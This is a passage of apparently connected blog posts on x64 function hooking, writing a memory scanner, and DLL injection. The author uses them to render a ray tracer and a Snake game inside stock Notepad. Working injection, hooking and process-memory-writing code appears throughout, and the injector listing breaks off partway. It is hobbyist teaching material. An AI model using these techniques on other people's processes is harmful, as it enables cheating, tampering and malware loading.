        disp -= int32_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 4);
    }break;
    }
}

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
    X64Instructions stolenInstrs = StealBytes(func2hook);

    uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
    uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
    uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

    for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
    {
        cs_insn& inst = stolenInstrs.instructions[i];
        if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
        {
            return 0; //bail out on loop instructions, I don't have a good way of handling them 
        }

        if (IsRIPRelativeInstr(inst))
        {
            RelocateInstruction(&inst, stolenByteMem);
        }
        else if (IsRelativeJump(inst))
        {
            uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
            RewriteJumpInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        else if (inst.id == X86_INS_CALL)
        {
            uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
            RewriteCallInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        memcpy(stolenByteMem, inst.bytes, inst.size);
        stolenByteMem += inst.size;
    }

    WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);
    free(stolenInstrs.instructions);

    return uint32_t(absTableMem - (uint8_t*)dstMemForTrampoline);
}


void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    void* hookMemory = AllocatePageNearAddress(func2hook);
    uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
    *trampolinePtr = hookMemory;

    //create the relay function
    void* relayFuncMemory = (char*)hookMemory + trampolineSize;
    WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

    //install the hook
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
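    //do the subtraction at full pointer width, then narrow to the 32 bit jump operand
    const int32_t relAddr = int32_t((int64_t)relayFuncMemory - ((int64_t)func2hook + (int64_t)sizeof(jmpInstruction)));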
    memcpy(jmpInstruction + 1, &relAddr, 4);
    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

//returns the first module called "name" -> only searches for dll name, not whole path
//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"
HMODULE FindModuleInProcess(HANDLE process, const char* name)
{
    char* lowerCaseName = _strdup(name);
    _strlwr_s(lowerCaseName, strlen(name)+1);

    HMODULE remoteProcessModules[1024];
    DWORD numBytesWrittenInModuleArray = 0;
    BOOL success = EnumProcessModules(process, remoteProcessModules, sizeof(HMODULE) * 1024, &numBytesWrittenInModuleArray);

    if (!success)
    {
        fprintf(stderr, "Error enumerating modules on target process. Error Code %lu \n", GetLastError());
        DebugBreak();
    }

    DWORD numRemoteModules = numBytesWrittenInModuleArray / sizeof(HMODULE);
    CHAR remoteProcessName[256];
    GetModuleFileNameEx(process, NULL, remoteProcessName, 256); //a null module handle gets the process name
    _strlwr_s(remoteProcessName, 256);

    MODULEINFO remoteProcessModuleInfo;
    HMODULE remoteProcessModule = 0; //An HMODULE is the DLL's base address 

    for (DWORD i = 0; i < numRemoteModules; ++i)
    {
        CHAR moduleName[256];
        CHAR absoluteModuleName[256];
        CHAR rebasedPath[256] = { 0 };
        GetModuleFileNameEx(process, remoteProcessModules[i], moduleName, 256);
        _strlwr_s(moduleName, 256);
        char* lastSlash = strrchr(moduleName, '\\');
        if (!lastSlash) lastSlash = strrchr(moduleName, '/');

        char* dllName = lastSlash ? lastSlash + 1 : moduleName; //no slash means the name is already bare

        if (strcmp(dllName, lowerCaseName) == 0)
        {
            remoteProcessModule = remoteProcessModules[i];

            success = GetModuleInformation(process, remoteProcessModules[i], &remoteProcessModuleInfo, sizeof(MODULEINFO));
            free(lowerCaseName);
            return remoteProcessModule;
        }
        //the following string operations are to account for cases where GetModuleFileNameEx
        //returns a relative path rather than an absolute one, the path we get to the module
        //is using a virtual drive letter (ie: one created by subst) rather than a real drive
        char* err = _fullpath(absoluteModuleName, moduleName, 256);
    }

    free(lowerCaseName);
    return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        HMODULE gdiPlusModule = FindModuleInProcess(GetCurrentProcess(), "gdiplus.dll");
        void* localHookFunc4 = GetProcAddress(gdiPlusModule, ("GdipSetSolidFillColor"));
        InstallHook(localHookFunc4, GdipSetSolidFillColorPayload, (void**)&GdipSetSolidFillColorTrampoline);
    }
    return true;
}
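
One step of InstallHook that’s easy to get wrong is the operand of the 5 byte relative jump: it’s the distance from the end of the jmp instruction to the target, and it has to fit in a signed 32 bit value, which is why the trampoline page gets allocated near the hooked function. Below is a minimal sketch of that calculation with an explicit range check. ComputeRel32 is a made-up name for this example and isn’t part of the listing above.

```cpp
#include <cstdint>

// Hypothetical helper: computes the operand for an E9 (jmp rel32) instruction
// located at jmpAddr that should land on targetAddr.
// Returns false if the target is too far away for a 32 bit displacement.
bool ComputeRel32(uint64_t jmpAddr, uint64_t targetAddr, int32_t* outRel)
{
    const int64_t kJmpSize = 5; // 1 opcode byte + 4 operand bytes

    // the displacement is measured from the address of the *next* instruction
    int64_t delta = int64_t(targetAddr) - (int64_t(jmpAddr) + kJmpSize);

    if (delta < INT32_MIN || delta > INT32_MAX)
    {
        return false;
    }

    *outRel = int32_t(delta);
    return true;
}
```

If a check like this fails, the relay function ended up too far from the hooked function, and the only safe option is to bail out rather than write a truncated jump.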

Where to Go Next

Despite being by far the longest post I’ve written to date, this rabbit hole goes a whole lot deeper than what I’ve written about here.

First of all, there are significant issues with the code written in this post:

There’s no way to uninstall hooks
Hooking 32 bit applications isn’t supported at all
Everything breaks if 2 hooked functions share a payload
Stuff also breaks if a thread is executing instructions while they’re being stolen
More stuff breaks if the stolen instructions for a function use the r10 register
There are at least 3 additional scary problems I don’t know about yet

I solve some of these problems (at least in a “good enough” sorta way) in my hooking-by-example repo, but others are left, I suppose, as an exercise for the reader. If you want to learn more, the sources for Detours, Minhook, Easyhook and Polyhook might be of interest. I found the Polyhook code the easiest to read, for whatever that’s worth.

There are also some really cool approaches to function hooking that don’t require you to know the function signature of what you’re hooking. I haven’t delved into this at all, but I’ve had this github repo starred for a while now.

Lastly, there’s a whole world of other hooking techniques out there. One that seems particularly interesting to me is import address table hooking, which RenderDoc uses. I expect I’ll lose several weekends to this very soon.

Final Thoughts

I’ve written a lot already, so I’ll keep my sign off short. There are two things that I didn’t find room to mention in the ocean of text above that I think warrant a mention:

If you try to disassemble a function that you have breakpoints set in, you’re going to have a bad time.
To debug an injected dll, attach your debugger to the process the dll was injected into.

Finally, my twitter handle is @khalladay. Send me questions or comments or whatever there. I’ll probably respond, unless I’m tired that day and forget to come back to it later.

Ray Tracing In Notepad.exe At 30 FPS

2020-05-20T00:00:00+00:00

A few months back, there was a post on Reddit (link), which described a game that used an open source clone of Notepad to handle all its input and rendering. While reading about it, I had the thought that it would be really cool to see something similar that worked with stock Windows Notepad. Then I spent way too much of my free time doing exactly that.

I ended up making a Snake game and a small ray tracer that use stock Notepad for all input and rendering tasks, and got to learn about DLL Injection, API Hooking and Memory Scanning along the way. It seemed like writing up the stuff I learned might make for an interesting read, and give me a chance to show off the dumb stuff I built at the same time, so that’s what these next couple blog posts will be about.

Due to length, I’ve split the writeup into two blog posts. This first post will talk about how Memory Scanners work, and how I used one to turn notepad.exe into a 30+ fps capable render target. I’ll also talk about the ray tracer that I built that rendered into Notepad.

The second post will talk about using windows hooks to capture input and share the Snake game I built that uses pretty much all the stuff described in both of these posts.

This post will cover how I made Notepad do this

If you just want to see the code, the whole project (including both the ray tracer and snake game) is up on github.

Sending Key Events To Notepad

The obvious place to kick all of this off is to talk about sending key events to a running instance of Notepad. This was the boring part of the project so I’ll be brief.

If you’ve never built an app out of Win32 controls (like I hadn’t), you might be surprised to learn that every UI element, from a menu bar to a button, is technically its own “window,” and sending key input to a program involves sending that input to the UI element you want to receive it. Luckily Visual Studio comes with a tool called Spy++ that can list all the windows that make up a given application.

The windows listed for Notepad in Spy++

Spy++ revealed that the Notepad child window I was after was the “Edit” window. Once I knew that, it was just a matter of figuring out the right mix of Win32 function calls to get an HWND for that UI element, and then sending key inputs there. Getting that HWND looked something like this:

HWND GetWindowForProcessAndClassName(DWORD pid, const char* className)
{
  HWND curWnd = GetTopWindow(0); //0 arg means to get the window at the top of the Z order
  char classNameBuf[256];

  while (curWnd != NULL){
    DWORD curPid;
    DWORD dwThreadId = GetWindowThreadProcessId(curWnd, &curPid);

    if (curPid == pid){
      GetClassName(curWnd, classNameBuf, 256);
      if (strcmp(className, classNameBuf) == 0) return curWnd;

      HWND childWindow = FindWindowEx(curWnd, NULL, className, NULL);
      if (childWindow != NULL) return childWindow;
    }
    curWnd = GetNextWindow(curWnd, GW_HWNDNEXT);
  }
  return NULL;
}

Once I had the HWND for the right control, drawing a character in Notepad’s edit control was just a matter of using PostMessage to send a WM_CHAR event to it.

Note that if you want to use Spy++ yourself, you probably want to use the 64 bit version of it, which is inexplicably not the version that Visual Studio 2019 launches by default. Instead you’ll need to search your Visual Studio Program files for “spyxx_amd64.exe.”

It took about 10 seconds after getting this working to realize that even if I could find a non-janky way to use window messages to draw full game screens into Notepad, it would be way too slow to even come close to approaching a 30hz refresh cycle. It was also really boring, so I didn’t spend too long looking for ways to make it go any faster.

CheatEngine For Good Guys

While getting the fake key input set up, I was reminded of CheatEngine. It’s a program that lets users find and modify memory in processes running on their machines. Most of the time it’s used by people trying to cheat at games or do other stuff that makes game devs sad, but it turns out it can also be a force for good.

Memory Scanners like CheatEngine work by finding all the memory addresses in a target process which contain a specific value. Let’s say you’re playing a game and you want to give yourself more health. You could follow a process that looks like this:

Use a memory scanner to find all addresses in the game’s memory that store the value of your health (let’s say 100).
Do something in game to modify your health to a new value (like 92).
Search all the addresses you found previously (that stored 100) to find ones that now store 92.
Repeat this process until you have a single memory address (which most likely is where your health is stored)
Modify the value at that address
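
The narrowing loop in those steps can be sketched in a few lines. This is a toy illustration under heavy assumptions, not how CheatEngine is implemented: the “process memory” is just a std::vector<int>, an “address” is an index into it, and the names FakeMemory, ScanForValue and NarrowCandidates are made up for the example.

```cpp
#include <cstddef>
#include <vector>

// Hypothetical stand-in for a process' memory: a flat array of ints.
using FakeMemory = std::vector<int>;

// First scan: collect every index ("address") that currently holds value.
std::vector<size_t> ScanForValue(const FakeMemory& mem, int value)
{
    std::vector<size_t> hits;
    for (size_t i = 0; i < mem.size(); ++i)
    {
        if (mem[i] == value) hits.push_back(i);
    }
    return hits;
}

// Follow-up scans: keep only the earlier candidates that now hold newValue.
std::vector<size_t> NarrowCandidates(const FakeMemory& mem,
                                     const std::vector<size_t>& candidates,
                                     int newValue)
{
    std::vector<size_t> stillMatching;
    for (size_t addr : candidates)
    {
        if (mem[addr] == newValue) stillMatching.push_back(addr);
    }
    return stillMatching;
}
```

You’d call ScanForValue once with the starting health, then call NarrowCandidates after every change in game until one candidate is left. Against a real process, the reads would go through ReadProcessMemory instead of indexing a vector.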

CheatEngine and Notepad, friends at last

This is pretty much what I did, except instead of a health value, I searched for memory that stored the string of text currently displayed in Notepad. After some trial and error, I was able to use CheatEngine to find (and change) the text being displayed. I also learned three important bits of info about Notepad:

Notepad’s edit window stores on screen text in UTF-16, even if the bottom right part of the window says your file is UTF-8
If I kept deleting and retyping the same string, CheatEngine would start finding multiple copies of this data in memory (possibly the undo buffer?)
I couldn’t replace the displayed text with a longer string, meaning that Notepad wasn’t preallocating a text buffer up front

Building A Memory Scanner

Despite not being able to modify the length of the text buffer, this seemed promising enough that I decided to write my own small memory scanner to embed in my project.

I couldn’t find a lot of information about building memory scanners, but I did find a great blog post by Chris Wellons that talks about (and links to) a memory scanner that he wrote for his own cheat tool. Using that blog post and the bit of experience I had with CheatEngine, I was able to piece together that the basic algorithm for a memory scanner looks something like this:

FOR EACH block of memory allocated by our target process
    IF that block is committed and read/write enabled
        Scan the contents of that block for our byte pattern
        IF WE FIND IT
            return that address

My whole memory scanner implementation only ended up being ~40 lines of code, so I’m just going to walk through all of it.

Iterating Over A Process’ Memory

The first thing a memory scanner needs to be able to do is iterate over a process’ allocated memory.

Since the range of virtual memory for every 64 bit process on Windows is the same (0x00000000000 through 0x7FFFFFFFFFFF), I started by making a pointer to address 0 and used VirtualQueryEx to get information about that virtual address for my target program.

VirtualQueryEx groups contiguous pages that have identical memory attributes into MEMORY_BASIC_INFORMATION structs, so it’s likely that the struct returned by VirtualQueryEx for a given address contains information about more than 1 page. The returned MEMORY_BASIC_INFORMATION stores this shared set of memory attributes, along with the address of the start of its span of pages, and the size of the whole span.

Once I had the first MEMORY_BASIC_INFORMATION struct, iterating through memory was just a matter of adding the current struct’s BaseAddress and RegionSize members together, and feeding the new address to VirtualQueryEx to get the next set of contiguous pages.

char* FindBytePatternInProcessMemory(HANDLE process, const char* pattern, size_t patternLen)
{
  char* basePtr = (char*)0x0;

  MEMORY_BASIC_INFORMATION memInfo;

  while (VirtualQueryEx(process, (void*)basePtr, &memInfo, sizeof(MEMORY_BASIC_INFORMATION)))
  {
    const DWORD mem_commit = 0x1000;
    const DWORD page_readwrite = 0x04;
    if (memInfo.State == mem_commit && memInfo.Protect == page_readwrite)
    {
      // search this memory for our pattern
    }

    basePtr = (char*)memInfo.BaseAddress + memInfo.RegionSize;
  }
  return nullptr; //no matching region found
}

The code above skips ahead a bit and also determines if a set of pages has been committed and is read/write enabled, by examining the .State and .Protect struct members. You can find all the possible values for these vars in the documentation for MEMORY_BASIC_INFORMATION, but the values that my scanner cared about were a state of 0x1000 (MEM_COMMIT) and a protection level of 0x04 (PAGE_READWRITE).
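
One thing worth knowing about that check: the Protect value can carry modifier flags (PAGE_GUARD, PAGE_NOCACHE, PAGE_WRITECOMBINE) OR’d onto the base protection constant, so an exact comparison against 0x04 skips read/write regions that have a modifier set. That was fine for Notepad, but a more forgiving filter might look like the sketch below. The constant values mirror the Windows SDK definitions and are redefined here only so the snippet stands alone; IsScannableRegion is a made-up name and isn’t part of the scanner in this post.

```cpp
#include <cstdint>

// Values match the Windows SDK; redefined so this sketch is self-contained.
constexpr uint32_t kMemCommit        = 0x1000; // MEM_COMMIT
constexpr uint32_t kPageReadWrite    = 0x04;   // PAGE_READWRITE
constexpr uint32_t kPageGuard        = 0x100;  // PAGE_GUARD
constexpr uint32_t kPageNoCache      = 0x200;  // PAGE_NOCACHE
constexpr uint32_t kPageWriteCombine = 0x400;  // PAGE_WRITECOMBINE

// Hypothetical filter: true for committed read/write regions,
// ignoring the caching modifiers but always skipping guard pages.
bool IsScannableRegion(uint32_t state, uint32_t protect)
{
    if (state != kMemCommit) return false;
    if (protect & kPageGuard) return false; // leave guard pages alone

    // strip the caching modifiers before comparing the base protection
    uint32_t baseProtect = protect & ~(kPageNoCache | kPageWriteCombine);
    return baseProtect == kPageReadWrite;
}
```

In the scanner loop this would be called as IsScannableRegion(memInfo.State, memInfo.Protect) in place of the two equality checks.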

Searching A Process’ Memory For a Byte Pattern

It’s not possible to read data in a different process’ address space directly (or at least, I didn’t stumble on how to do it). Instead, I first needed to copy the contents of a page range to the memory scanner’s address space. I did this with ReadProcessMemory.

Once the memory was copied to a locally visible buffer, searching it for a byte pattern was easy enough. To make things simpler, I ignored the possibility that there could be multiple copies of the target byte pattern in memory in my first scanner implementation. I ended up coming up with a hacky workaround for this problem later on that saved me from ever having to actually address it in my scanner logic.

char* FindPattern(char* src, size_t srcLen, const char* pattern, size_t patternLen)
{
  char* cur = src;
  size_t curPos = 0;

  //stop once the pattern no longer fits, so memcmp never reads past the end of src
  while (curPos + patternLen <= srcLen){
    if (memcmp(cur, pattern, patternLen) == 0){
      return cur;
    }

    curPos++;
    cur = &src[curPos];
  }
  return nullptr;
}

If FindPattern() returned a match pointer, its address needed to be converted to the address of the same bit of memory in the target process’ address space. To do that, I subtracted the starting address of the local buffer from the address that was returned from FindPattern to get an offset, and then added that to the base address of the memory chunk in the target process. You can see this below.

char* FindBytePatternInProcessMemory(HANDLE process, const char* pattern, size_t patternLen)
{
  MEMORY_BASIC_INFORMATION memInfo;
  char* basePtr = (char*)0x0;
  
  while (VirtualQueryEx(process, (void*)basePtr, &memInfo, sizeof(MEMORY_BASIC_INFORMATION))){
    const DWORD mem_commit = 0x1000;
    const DWORD page_readwrite = 0x04;
    if (memInfo.State == mem_commit && memInfo.Protect == page_readwrite){
      char* remoteMemRegionPtr = (char*)memInfo.BaseAddress;
      char* localCopyContents = (char*)malloc(memInfo.RegionSize);

      SIZE_T bytesRead = 0;
      if (ReadProcessMemory(process, memInfo.BaseAddress, localCopyContents, memInfo.RegionSize, &bytesRead)){
        char* match = FindPattern(localCopyContents, memInfo.RegionSize, pattern, patternLen);
        
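        if (match){
          uint64_t diff = (uint64_t)match - (uint64_t)(localCopyContents);
          char* processPtr = remoteMemRegionPtr + diff;
          free(localCopyContents); //don't leak the local copy on the success path
          return processPtr;
        }
      }
      free(localCopyContents);
    }
    basePtr = (char*)memInfo.BaseAddress + memInfo.RegionSize;
  }
  return nullptr; //pattern wasn't found in any committed read/write region
}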

If you want to see a working example of this, check out the “MemoryScanner” project in the github repo that accompanies this blog post. Try it on Notepad! (it hasn’t been tried on anything else, so ymmv).

Using UTF-16 Byte Patterns

Remember from earlier that Notepad stores its on screen text buffer as UTF-16 data, so the byte pattern that gets fed to FindBytePatternInProcessMemory() also has to be UTF-16. For simple strings, this just involves adding a zero byte after every character. The MemoryScanner project in github does this for you:

//convert input string to UTF16 (hackily)
const size_t patternLen = strlen(argv[2]);
char* pattern = new char[patternLen*2];
for (size_t i = 0; i < patternLen; ++i){
  pattern[i*2] = argv[2][i];
  pattern[i*2 + 1] = 0x0;
}

Updating and Redrawing Notepad’s Edit Control

Once I had the address of the displayed text buffer in Notepad, the next step was to use WriteProcessMemory to modify it. Writing code for that was trivial, but I quickly learned that just writing to the text buffer wasn’t enough to make Notepad redraw its Edit control.

Luckily the Win32 api had my back on this, and provides the InvalidateRect function to force a control to redraw itself.

All together, modifying the displayed text in Notepad looked something like this:

void UpdateText(HANDLE process, HWND editWindow, char* notepadTextBuffer, char* replacementTextBuffer, int len)
{
  SIZE_T written = 0;
  WriteProcessMemory(process, notepadTextBuffer, replacementTextBuffer, len, &written);

  RECT r;
  GetClientRect(editWindow, &r);
  InvalidateRect(editWindow, &r, false);
}

From Memory Scanner to Renderer

The gap between a working memory scanner and a full fledged notepad renderer is surprisingly small. There were only three issues that needed to be sorted out to go from what I’ve described so far to the ray tracer teased at the beginning of this post.

These issues were:

I needed to control the size of the Notepad window
I still couldn’t expand the size of the on screen text buffer
My memory scanner didn’t handle duplicate byte patterns.

The first issue wasn’t much of a problem on its own. It was trivial to add a call to MoveWindow, but I included it in the list because this was an important part of how I approached the next issue on the list.

I ended up hard coding the size I wanted my Notepad window to be, and then counted how many characters (of a monospace font) it would take to exactly fill a window of that size. Then after calling MoveWindow, I pre-allocated the on screen text buffer by sending that many WM_CHAR messages to Notepad. This felt like cheating, but the good kind of cheating.

To make sure that I always had a unique byte pattern to search for, I just randomized which chars I sent in the WM_CHAR messages.

I’ve included what this might look like in code. The actual code in the github repo is formatted a little bit differently, but works the same way.

void PreallocateTextBuffer(DWORD processId)
{
  HWND editWindow = GetWindowForProcessAndClassName(processId, "Edit");

  // it takes 131 * 30 chars to fill a 1365x768 window with Consolas (size 11) chars
  MoveWindow(instance.topWindow, 100, 100, 1365, 768, true); 

  size_t charCount = 131 * 30;
  size_t utf16BufferSize = charCount * 2;

  char* frameBuffer = (char*)malloc(utf16BufferSize);
  for (int i = 0; i < charCount; i++){
    char v = 0x41 + (rand() % 26);
    PostMessage(editWindow, WM_CHAR, v, 0);
    frameBuffer[i * 2] = v;
    frameBuffer[i * 2 + 1] = 0x00;
  }
  
  Sleep(5000); //wait for input messages to finish processing...it's slow. 
  //Now use the frameBuffer as the unique byte pattern to search for
}

What this meant for the end product is that immediately after starting, I had to watch my Notepad window slowly fill up with random characters, before I could acquire the text buffer pointer and clear the screen.

All of the above relies on using a known font face and font size in order to work right. I was going to add some code to force notepad to use the fonts I wanted (Consolas, 11pt), but for some reason sending WM_SETFONT messages kept messing up how fonts were displaying, and I didn’t feel like figuring out what was going wrong there. Consolas 11pt was the default Notepad font on my system, which was good enough for me.

Ray Tracing In Notepad

Explaining how to build a ray tracer is well beyond the scope of what I want to talk about in this post. If you’re unfamiliar with ray tracing in general, head over to ScratchAPixel and learn you some ray tracing for great good. What I want to finish off this post with is a quick discussion of the nuts and bolts of hooking a ray tracer up to all the stuff I just talked about.

It probably makes sense to start off with the frame buffers. In order to minimize the number of WriteProcessMemory calls (both for sanity and performance), I allocated a ray-tracer-local buffer that was the same size as Notepad’s text buffer (number of characters * 2 (because UTF16)). All the rendering calculations would write to this local buffer until the end of the frame, when I used a single WriteProcessMemory call to replace the entire contents of Notepad’s buffer at once. This led to a really simple set of functions for drawing:

void drawChar(int x, int y, char c); //local buffer
void clearScreen(); // local buffer
void swapBuffersAndRedraw(); // pushes changes and refreshes screen.
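
To give a feel for how little is behind those declarations, here’s a rough sketch of the two functions that only touch the local buffer. It assumes the characters are laid out row by row with no newline characters in between, and that everything drawn is plain ASCII; the localBuffer name and the bounds check are assumptions for this example, and the real code in the github repo may differ.

```cpp
#include <cstddef>
#include <vector>

constexpr int SCREEN_CHARS_WIDE = 131;
constexpr int SCREEN_CHARS_TALL = 30;

// Local copy of Notepad's text buffer: 2 bytes per character (UTF-16).
std::vector<char> localBuffer(size_t(SCREEN_CHARS_WIDE) * SCREEN_CHARS_TALL * 2, '\0');

void drawChar(int x, int y, char c)
{
    // ignore anything that falls outside the character grid
    if (x < 0 || x >= SCREEN_CHARS_WIDE || y < 0 || y >= SCREEN_CHARS_TALL) return;

    size_t index = (size_t(y) * SCREEN_CHARS_WIDE + size_t(x)) * 2;
    localBuffer[index] = c;        // low byte of the UTF-16 code unit
    localBuffer[index + 1] = '\0'; // high byte is zero for plain ASCII
}

void clearScreen()
{
    for (int y = 0; y < SCREEN_CHARS_TALL; ++y)
    {
        for (int x = 0; x < SCREEN_CHARS_WIDE; ++x)
        {
            drawChar(x, y, ' ');
        }
    }
}
```

swapBuffersAndRedraw() would then hand localBuffer.data() and localBuffer.size() to something like the UpdateText function from earlier, so each frame costs one write and one redraw.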

On the ray tracing side, given the low resolution of my render target (131 x 30), I had to keep things very simple, since there just weren’t enough “pixels” to display fine detail nicely. I ended up only tracing a single primary ray and a shadow ray for each pixel being rendered to, and I thought about ditching the shadows until I found a nice grayscale float to ascii color ramp on Paul Bourke’s website. Having such a low complexity scene and small render surface also meant that I didn’t end up needing to parallelize the rendering at all.
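
A float to ascii ramp boils down to an array lookup. The sketch below assumes a 10 character ramp ordered from the sparsest glyph to the densest one; the ramp string and the rampChar name are assumptions for this example, and the project may use a different ramp. Whether the dense end reads as “bright” or “dark” depends on whether the text is light-on-dark or dark-on-light, so flip the input if needed.

```cpp
#include <cstddef>

// Assumed ramp: sparsest glyph first, densest glyph last.
static const char kRamp[] = " .:-=+*#%@";

// Maps t in [0, 1] to a ramp character (0 picks ' ', 1 picks '@').
char rampChar(float t)
{
    // clamp so out-of-range shading values can't index outside the ramp
    if (t < 0.0f) t = 0.0f;
    if (t > 1.0f) t = 1.0f;

    const size_t rampLen = sizeof(kRamp) - 1; // exclude the trailing '\0'
    size_t index = size_t(t * float(rampLen - 1) + 0.5f); // round to the nearest step
    return kRamp[index];
}
```

With something like this in place, shading a pixel is just drawChar(x, y, rampChar(shade)), where shade is whatever the primary and shadow rays produced for that pixel.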

I also ran into some issues getting things to look right due to characters being taller than they are wide. In the end, I “fixed” this by halving the width value I used in my aspect ratio calculations.

float aspect = (0.5f * SCREEN_CHARS_WIDE) / float(SCREEN_CHARS_TALL);
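
Here’s a rough sketch of where that aspect value ends up being used: turning a character cell into a point on the image plane that a primary ray can be aimed at. Halving the width treats each cell as roughly twice as tall as it is wide. The ScreenCoord struct and cellToScreen function are made up for this example, and the convention of v running from +1 at the top to -1 at the bottom is an assumption.

```cpp
constexpr int SCREEN_CHARS_WIDE = 131;
constexpr int SCREEN_CHARS_TALL = 30;

struct ScreenCoord
{
    float u; // horizontal position, in [-aspect, aspect]
    float v; // vertical position, in [-1, 1], +1 at the top
};

// Hypothetical helper: maps the center of character cell (x, y) onto the image plane.
ScreenCoord cellToScreen(int x, int y)
{
    const float aspect = (0.5f * SCREEN_CHARS_WIDE) / float(SCREEN_CHARS_TALL);

    // normalize the cell center to the 0..1 range in both directions
    float ndcX = (float(x) + 0.5f) / float(SCREEN_CHARS_WIDE);
    float ndcY = (float(y) + 0.5f) / float(SCREEN_CHARS_TALL);

    ScreenCoord out;
    out.u = (2.0f * ndcX - 1.0f) * aspect; // stretch horizontally by the corrected aspect
    out.v = 1.0f - 2.0f * ndcY;            // flip so row 0 is at the top
    return out;
}
```

Without the 0.5 factor, u would span twice the range and everything in the scene would look squashed horizontally.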

The one remaining problem that I haven’t found a workable solution for is that updating the contents of the Notepad’s edit control so frequently causes a very noticeable flicker. I tried a bunch of different things to get rid of this, including trying to double buffer the edit control by allocating twice the number of characters and using WM_VSCROLL messages to “swap” the buffer by adjusting the scroll bar position. Unfortunately nothing I tried worked, and the flicker remains.

Part 2: Input Boogaloo is Available Now!

The next (and final) part of my quest to make a real-time game in Notepad was to figure out how to handle user input. If you’ve gotten this far and are thirsty for more, the next post is available here!

Hooking Keyboard Input To Play Snake In Notepad.exe

2020-05-20T00:00:00+00:00

This is the second (and last) post about my quest to make a real-time game playable in stock Notepad.exe. In the previous article, I talked through using a quick and dirty memory scanner to get access to Notepad’s on screen text buffer (and build a ray tracer that rendered into it). In this post I’m going to talk about how I handled getting user input, and finally ended up at a fully playable Snake game in stock Notepad.

The flickering problem from last time is still very not-fixed

Baby’s First DLL Injection

The title of this post gives away the fact that I ended using hooks to capture user input, but I originally thought I could do it with just DLL injection instead. I barely knew what DLL injection was but I knew it could cause things to happen in an already running process. This seemed like a decent place to start. As it turns out, you need to understand dll injection to work with hooks anyway, so it’s not a bad spot to start this blog post too.

I started by googling the hell out of “DLL injection,” and found this excellent article that breaks down what DLL Injection is and has a great github repo with examples of different ways to go about it. I didn’t have a clue about how I was going to use any of this to capture keyboard input, but I figured I’d try to inject something simple into a running Notepad process anyway.

Based on the injection article I just linked, the easiest way to inject a dll seems to be:

Create a DLL that performs some action in dllmain when it is loaded
Open a handle (“attach”) to a running process
Allocate some memory in that process’ address space
Use LoadLibrary to load that DLL into that process
When it loads, that DLL does the stuff in dllmain

Writing a DLL that does something in dllmain() is really easy if you aren’t doing a whole lot with it. I found later on that there’s a whole lot of stuff that you can’t do in dllmain (more info here), but for my first test project I just popped open a message box. The entire code for the DLL payload was just a few lines.

//a small dll payload that spawns a message box in whatever process loads the dll
#define WIN32_LEAN_AND_MEAN 
#include <windows.h>

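BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  switch (ul_reason_for_call){
    case DLL_PROCESS_ATTACH:
      //MessageBoxA so the narrow strings compile whether or not UNICODE is defined
      MessageBoxA(NULL, "Process attach!", "Woohoo", 0);
      break;
  }
  return TRUE; //returning FALSE from DLL_PROCESS_ATTACH makes the load fail
}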

The tricky part, as you might imagine, was getting Notepad to load this in the first place. Just like the above payload, my injection code was almost entirely copied from the InjectAllTheThings repo I linked above. Unlike the payload, it’s a lot longer. I’m including it here because if you’ve never seen how to do this before, I assume this will be more convenient than having to click a link to github, but I’m not going to dive into how it works because the article/repo I linked above can teach you about it a whole lot better than I can.

Full DLL Injection Code

//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process
// usage: Injector_LoadLibrary <process name> <path to dll> 

#include <stdio.h>
#include <string.h> //for strlen and strcmp
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h

void printHelp()
{
	printf("Injector_LoadLibrary\nUsage: Injector_LoadLibrary <process name> <path to dll>\n");
}

void createRemoteThread(DWORD processID, const char* dllPath)
{
	HANDLE handle = OpenProcess(
		PROCESS_QUERY_INFORMATION | //Needed to get a process' token
		PROCESS_CREATE_THREAD |	  //for obvious reasons
		PROCESS_VM_OPERATION |	  //required to perform operations on address space of process (like WriteProcessMemory)
		PROCESS_VM_WRITE,	//required for WriteProcessMemory
		FALSE,			//don't inherit handle
		processID);

	if (handle == NULL)
	{
		fprintf(stderr, "Could not open process with pid: %lu\n", processID);
		return;
	}

	//once the process is open, we need to write the name of our dll to that process' memory
	size_t dllPathLen = strlen(dllPath) + 1; //+1 so the null terminator gets written too
	void* dllPathRemote = VirtualAllocEx(
		handle,
		NULL, //let the system decide where to allocate the memory
		dllPathLen,
		MEM_COMMIT, //actually commit the virtual memory
		PAGE_READWRITE); //mem access for committed page
	
	if (!dllPathRemote)
	{
		fprintf(stderr, "Could not allocate %zu bytes in process with pid: %lu\n", dllPathLen, processID);
		return;
	}

	BOOL writeSucceeded = WriteProcessMemory(
		handle,
		dllPathRemote,
		dllPath,
		dllPathLen,
		NULL);
	
	if (!writeSucceeded)
	{
		fprintf(stderr, "Could not write %zu bytes to process with pid %lu\n", dllPathLen, processID);
		return;
	}

	//now get address of LoadLibraryA function inside Kernel32.dll (the ANSI version, since dllPath is a char string)
	//TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"
